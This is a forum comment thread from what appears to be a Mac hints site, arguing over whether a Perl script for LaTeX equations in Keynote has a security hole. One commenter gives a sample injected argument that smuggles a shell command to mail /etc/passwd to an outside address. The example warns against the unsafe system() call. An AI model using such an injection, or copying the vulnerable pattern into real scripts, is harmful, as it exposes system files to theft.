Submit Hint Search The Forums LinksStatsPollsHeadlinesRSS
14,000 hints and counting!


Click here to return to the 'Use LaTeX formatted equations in Keynote' hint
The following comments are owned by whoever posted them. This site is not responsible for what they say.
Use LaTeX formatted equations in Keynote
Authored by: KM on Feb 20, '03 04:53:38PM
(Sorry for reposting this, the > was un-entitized when I previewed and cut off some of post.. seems like a bug) You don't consider something like this a security issue? This is essentially what your code does:

system("echo $ARGV[0]");

Now, if the script was named foo.pl and called like:

foo.pl ";mail me@me.com < /etc/passwd"

I'd get your passwd file. Or, perform whatever (multiple) shell functions I can with the permissions of the script. That's a security issue, and a basic one. I appreciate that you posted a hint, don't get me wrong... but too many times people take code from hint sites and use them, not knowing the danger that can be caused. Code with glaring security holes shouldn't be posted.. in my opinion :)

[ Reply to This | # ]

Use LaTeX formatted equations in Keynote
Authored by: EddEdmondson on Feb 20, '03 06:28:06PM

The reason I don't consider that a security issue is that if you've got access to perl and the command prompt anyway you can just get the file without faffing around with my script.

Sure it's a bad idea but it doesn't give an attacker any extra abilities they don't already have - unlike your point about tmp. Unless I'm missing something very obvious in which case I'll accept your point. I tend to just write this sort of thing for my own use, and like I said would let other people fix bugs etc. in comments.



[ Reply to This | # ]
Use LaTeX formatted equations in Keynote
Authored by: mithras on Feb 21, '03 11:53:44AM

That would be a security issue IF the script were being called from the Web or an unprivileged environment.

But your example would require the user to be able to run the command on the Mac anyway. Why call the script, if you can just run "mail me@my.com < /etc/passwd" directly?

Consider what is wrong with this statement: the 'sh' program is a HUGE security hole! It will just run willy-nilly any command you pass to it!

---
--
<a href="http://mithras.homeunix.net/downloads">my free OS X applications and scripts</a>



[ Reply to This | # ]
Use LaTeX formatted equations in Keynote
Authored by: KM on Feb 21, '03 01:54:14PM

You people are missing the point. The script is being posted on a "hints" site, and it is not secure. If it is on a multi-user environment, it can be dangerous. This isn't rocket science, it is Security 101. Posting insecure scripts on a 'hints' site is plain wrong. Period.



[ Reply to This | # ]